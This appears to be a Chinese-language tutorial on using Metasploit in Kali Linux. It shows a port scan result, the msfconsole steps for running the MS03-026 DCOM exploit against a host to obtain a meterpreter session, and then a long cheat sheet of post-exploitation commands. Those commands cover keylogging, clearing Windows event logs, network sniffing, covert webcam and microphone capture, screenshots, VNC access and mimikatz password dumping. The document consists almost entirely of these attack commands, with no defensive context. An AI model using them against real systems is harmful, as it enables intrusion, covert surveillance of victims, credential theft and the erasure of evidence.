网络安全 kali web 安全 Kali 之 msf 简单的漏洞利用

21/tcp   	ftp135/tcp  	msrpc139/tcp  	netbios-ssn445/tcp  	microsoft-ds777/tcp  	multiling-http1025/tcp 	NFS-or-IIS1026/tcp 	LSA-or-nterm1029/tcp 	ms-lsa1030/tcp 	iad16002/tcp 	X11:27001/tcp 	afs3-callback7002/tcp 	afs3-prserver8099/tcp 	未知服务

root@kali:~# msfconsole

msf5 > search dcom

msf5 > use exploit/windows/dcerpc/ms03_026_dcom 

msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options

msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136RHOSTS => 192.168.174.136

msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit 

meterpreter > ipconfig

基本系统命令——————————shell			进入目标主机cmd shellreboot			重启目标主机shutdown		关闭目标主机sysinfo			查看目标主机系统信息background		将当前会话放置后台info			查看已有信息模块run				执行已有的模块，输入run后按tab键补全，会列出已有的脚本clearav 		清除windows中的应用程序日志、系统日志、安全日志ipconfig		查看网络配置信息netstat			查看网络连接信息getproxy		查看代理信息route			查看路由arp				查看arp信息

进程列表：——————————getuid			获取系统ID以及计算机名称getpid			获取当前进程标识符kill			结束进程ps				列出正在运行中的进程

鼠标/键盘操作——————————keyscan_start	开启按键记录会话keyscan_stop	终止按键记录会话keyscan_dump	转储从目标主机捕获到的按键记录uictl enable mouse 		启用鼠标uictl disable mouse  	禁用鼠标uictl enable keyboard	启用键盘uictl disable keyboard  禁用键盘

会话——————————enumdesktops	列举所有可访问到的桌面和工作站getdesktop		获取当前Meterpreter桌面setdesktop		变更Meterpreter当前桌面

嗅探功能——————————use sniffer		加载嗅探功能sniffer_interfaces   	查看网卡sniffer_start	开始对网卡执行嗅探sniffer_stats	查看状态sniffer_stop	停止对网卡的嗅探sniffer_dump	将捕获到的目标主机上的数据转储到本地

摄像头命令——————————webcam_list		列举系统所有的摄像头webcam_snap		使用目标主机摄像头拍照record_mic		从主机的默认麦克风中记录环境声音webcam_stream	通过摄像头开启视频

远程桌面/截屏——————————enumdesktops	查看可用的桌面getdesktop		获取当前meterpreter 关联的桌面set_desktop		设置meterpreter关联的桌面  -h查看帮助screenshot		截屏use espia		或者使用espia模块截屏  然后输入screengrabrun vnc			使用vnc远程桌面连接

抓取密码——————————load mimikatz	查看帮助wdigest			获取Wdigest密码mimikatz_command -f samdump::hashes		执行mimikatz原始命令mimikatz_command -f sekurlsa::searchPasswords